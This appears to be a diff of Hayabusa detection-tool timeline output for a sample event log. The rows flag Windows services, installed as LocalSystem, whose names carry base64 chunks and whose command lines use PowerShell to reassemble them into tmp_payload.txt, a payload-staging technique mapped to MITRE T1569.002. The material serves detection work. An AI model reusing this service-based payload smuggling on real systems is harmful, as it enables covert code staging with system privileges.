+2021-11-03 17:19:52.841 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:54.310 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:54.310 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:54.310 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:55.761 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:55.761 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:55.761 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:57.214 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:57.214 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:57.214 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:58.655 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:58.655 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:58.655 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:00.108 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:00.108 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:00.108 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:01.550 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:01.550 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:01.550 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:03.020 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:03.020 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:03.020 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:04.472 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:04.472 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:04.472 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:05.916 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:05.916 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:05.916 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:07.360 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: V0dG9uLlNpemUgPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDIwKQ0KICAgICAgICAkQnV0dG9uLlRleHQgPSAiU3VibWl0Ig0KICAgICAgICAkQnV0dG9uLkFkZF9DbGljayh7 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:07.360 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: V0dG9uLlNpemUgPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDIwKQ0KICAgICAgICAkQnV0dG9uLlRleHQgPSAiU3VibWl0Ig0KICAgICAgICAkQnV0dG9uLkFkZF9DbGljayh7 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:07.360 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: V0dG9uLlNpemUgPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDIwKQ0KICAgICAgICAkQnV0dG9uLlRleHQgPSAiU3VibWl0Ig0KICAgICAgICAkQnV0dG9uLkFkZF9DbGljayh7 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:08.810 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: UmV0dXJuLURyb3BEb3dufSkNCiAgICAgICAgJGZvcm0uQ29udHJvbHMuQWRkKCRCdXR0b24pDQoNCiAgICAgICAgJERyb3BEb3duLlNlbGVjdGVkSW5kZXggPSAgMA0KICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:08.810 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UmV0dXJuLURyb3BEb3dufSkNCiAgICAgICAgJGZvcm0uQ29udHJvbHMuQWRkKCRCdXR0b24pDQoNCiAgICAgICAgJERyb3BEb3duLlNlbGVjdGVkSW5kZXggPSAgMA0KICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:08.810 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UmV0dXJuLURyb3BEb3dufSkNCiAgICAgICAgJGZvcm0uQ29udHJvbHMuQWRkKCRCdXR0b24pDQoNCiAgICAgICAgJERyb3BEb3duLlNlbGVjdGVkSW5kZXggPSAgMA0KICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:10.268 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgJEZvcm0uQWRkX1Nob3duKHskRm9ybS5BY3RpdmF0ZSgpfSkNCiAgICAgICAgW3ZvaWRdICRGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgICRDaG9pY2UNCiAgICAgfQ0KICAgICANCiAgICBj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:10.268 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgJEZvcm0uQWRkX1Nob3duKHskRm9ybS5BY3RpdmF0ZSgpfSkNCiAgICAgICAgW3ZvaWRdICRGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgICRDaG9pY2UNCiAgICAgfQ0KICAgICANCiAgICBj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
